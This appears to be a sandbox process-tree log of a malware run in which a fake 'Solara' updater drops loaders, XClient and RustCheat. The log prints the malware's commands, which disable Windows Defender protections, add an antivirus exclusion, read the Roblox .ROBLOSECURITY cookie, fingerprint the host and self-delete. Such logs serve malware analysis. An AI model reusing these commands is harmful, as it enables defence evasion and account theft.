C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause6⤵PID:2268
-
C:\Windows\system32\PING.EXEping localhost7⤵
- Runs ping.exe
PID:484
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"4⤵
- Executes dropped EXE
PID:1808 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"5⤵PID:1352
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "6⤵
- Loads dropped DLL
PID:2532 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"7⤵
- Executes dropped EXE
PID:1624
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"4⤵PID:1136
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"5⤵
- Executes dropped EXE
PID:2616 -
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"6⤵
- Executes dropped EXE
PID:1256
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"6⤵
- Executes dropped EXE
PID:2476
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"5⤵
- Executes dropped EXE
PID:800 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"6⤵PID:768
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "7⤵
- Loads dropped DLL
PID:2324 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"8⤵
- Executes dropped EXE
PID:2960
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"5⤵PID:344
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"6⤵
- Executes dropped EXE
PID:2204 -
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"7⤵
- Executes dropped EXE
PID:2600
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"7⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:2040 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid8⤵PID:2748
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"8⤵
- Views/modifies file attributes
PID:2916
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'8⤵
- Command and Scripting Interpreter: PowerShell
PID:2080
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 8⤵PID:1548
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY8⤵PID:908
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY8⤵PID:2144
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption8⤵PID:2868
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory8⤵PID:2036
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid8⤵PID:1976
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER8⤵PID:1936
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name8⤵
- Detects videocard installed
PID:2092
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause8⤵PID:892
-
C:\Windows\system32\PING.EXEping localhost9⤵
- Runs ping.exe
PID:2332
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"6⤵
- Executes dropped EXE
PID:2196 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"7⤵PID:2692
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "8⤵
- Loads dropped DLL
PID:568 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"9⤵
- Executes dropped EXE
PID:2864
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"6⤵PID:2708
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"7⤵
- Executes dropped EXE
PID:1516 -
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"8⤵
- Executes dropped EXE
PID:2156
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"8⤵
- Executes dropped EXE
PID:2160
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"7⤵
- Executes dropped EXE
PID:3044 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"8⤵PID:2576
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "9⤵
- Loads dropped DLL
PID:748 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"10⤵
- Executes dropped EXE
PID:2172
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"7⤵PID:332
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"8⤵
- Executes dropped EXE
PID:1636
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"8⤵
- Executes dropped EXE
PID:2160 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"9⤵PID:3060
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "10⤵
- Loads dropped DLL
PID:484 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"11⤵
- Executes dropped EXE
PID:2624
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"8⤵PID:1684
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"9⤵
- Executes dropped EXE
PID:2716
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"9⤵
- Executes dropped EXE
PID:1716 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"10⤵PID:2768
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "11⤵
- Loads dropped DLL
PID:908 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"12⤵
- Executes dropped EXE
PID:1084
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"9⤵PID:1208
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"10⤵
- Executes dropped EXE
PID:2712
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"10⤵
- Executes dropped EXE
PID:2024 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"11⤵PID:1824
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "12⤵
- Loads dropped DLL
PID:1304 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"13⤵
- Executes dropped EXE
PID:2868
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"10⤵PID:2704
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"11⤵
- Executes dropped EXE
PID:2944
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"11⤵
- Executes dropped EXE
PID:2632 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"12⤵PID:1728
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "13⤵
- Loads dropped DLL
PID:1080 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"14⤵PID:2700
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"11⤵PID:1944
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"12⤵
- Executes dropped EXE
PID:1904
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"12⤵
- Executes dropped EXE
PID:2960 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"13⤵PID:2436
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "14⤵
- Loads dropped DLL
PID:2280 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"15⤵PID:2612
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"12⤵PID:2132
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"13⤵
- Executes dropped EXE
PID:2432
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"13⤵
- Executes dropped EXE
PID:2000 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"14⤵PID:3068
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "15⤵
- Loads dropped DLL
PID:1748 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"16⤵PID:2712
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"13⤵PID:2624
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"14⤵
- Executes dropped EXE
PID:824
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"14⤵
- Executes dropped EXE
PID:1064 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"15⤵PID:2180
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "16⤵
- Loads dropped DLL
PID:1568 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"17⤵PID:776
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"14⤵PID:864
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"15⤵
- Executes dropped EXE
PID:3052
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"15⤵
- Executes dropped EXE
PID:1548 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"16⤵PID:3048
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "17⤵
- Loads dropped DLL
PID:2652 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"18⤵PID:2176
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"15⤵PID:1632
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"16⤵
- Executes dropped EXE
PID:1356
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"16⤵
- Executes dropped EXE
PID:2140 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"17⤵PID:468
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "18⤵
- Loads dropped DLL
PID:2704 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"19⤵PID:1604
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"16⤵PID:1500
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"17⤵
- Executes dropped EXE
PID:996
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"17⤵
- Executes dropped EXE
PID:2428 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"18⤵PID:2824
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "19⤵
- Loads dropped DLL
PID:2864 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"20⤵PID:2568
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"17⤵PID:2812
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"18⤵
- Executes dropped EXE
PID:1952 -
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"19⤵PID:1916
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"19⤵
- Drops file in Drivers directory
PID:2396 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid20⤵PID:2092
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"20⤵
- Views/modifies file attributes
PID:1308
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'20⤵
- Command and Scripting Interpreter: PowerShell
PID:2436
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 20⤵PID:304
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY20⤵PID:2008
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY20⤵PID:2276
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption20⤵PID:1308
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory20⤵PID:2312
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid20⤵PID:1484
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER20⤵PID:1084
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name20⤵
- Detects videocard installed
PID:1748
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause20⤵PID:1292
-
C:\Windows\system32\PING.EXEping localhost21⤵
- Runs ping.exe
PID:2820
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"18⤵
- Executes dropped EXE
PID:344 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"19⤵PID:2104
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "20⤵
- Loads dropped DLL
PID:2196 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"21⤵PID:2148
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"18⤵PID:332
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"19⤵
- Executes dropped EXE
PID:308
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"19⤵
- Executes dropped EXE
PID:2260 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"20⤵PID:2600
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "21⤵
- Loads dropped DLL
PID:1764 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"22⤵PID:2244
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"19⤵PID:988
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"20⤵
- Executes dropped EXE
PID:1892
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"20⤵
- Executes dropped EXE
PID:2928 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"21⤵PID:1632
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "22⤵
- Loads dropped DLL
PID:2068 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"23⤵PID:848
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"20⤵PID:2060
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"21⤵
- Executes dropped EXE
PID:1500
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"21⤵
- Executes dropped EXE
PID:1060 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"22⤵PID:1100
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "23⤵
- Loads dropped DLL
PID:1332 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"24⤵PID:1040
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"21⤵PID:1996
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"22⤵
- Executes dropped EXE
PID:3056
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"22⤵PID:1384
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"23⤵PID:1948
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "24⤵
- Loads dropped DLL
PID:1780 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"25⤵PID:756
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"22⤵PID:1576
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"23⤵PID:1672
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"23⤵PID:268
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"24⤵PID:1908
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "25⤵
- Loads dropped DLL
PID:2744 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"26⤵PID:804
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"23⤵PID:2272
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"24⤵PID:2572
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"24⤵PID:1604
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"25⤵PID:1944
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "26⤵
- Loads dropped DLL
PID:2984 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"27⤵PID:2072
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"24⤵PID:2072
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"25⤵PID:2984
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"25⤵PID:2692
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"26⤵PID:2080
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "27⤵
- Loads dropped DLL
PID:2196 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"28⤵PID:1156
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"25⤵PID:1640
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"26⤵PID:1652
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"26⤵PID:2740
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"27⤵PID:1544
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "28⤵
- Loads dropped DLL
PID:2840 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"29⤵PID:2740
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"26⤵PID:2172
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"27⤵PID:1088
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"27⤵PID:2876
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"28⤵PID:2668
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "29⤵
- Loads dropped DLL
PID:2192 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"30⤵PID:2260
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"27⤵PID:1200
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"28⤵PID:1708
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"29⤵PID:2068
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"29⤵PID:2372
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"28⤵PID:1588
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"29⤵PID:2692
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "30⤵
- Loads dropped DLL
PID:1692 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"31⤵PID:2360
-
-
-
-
-
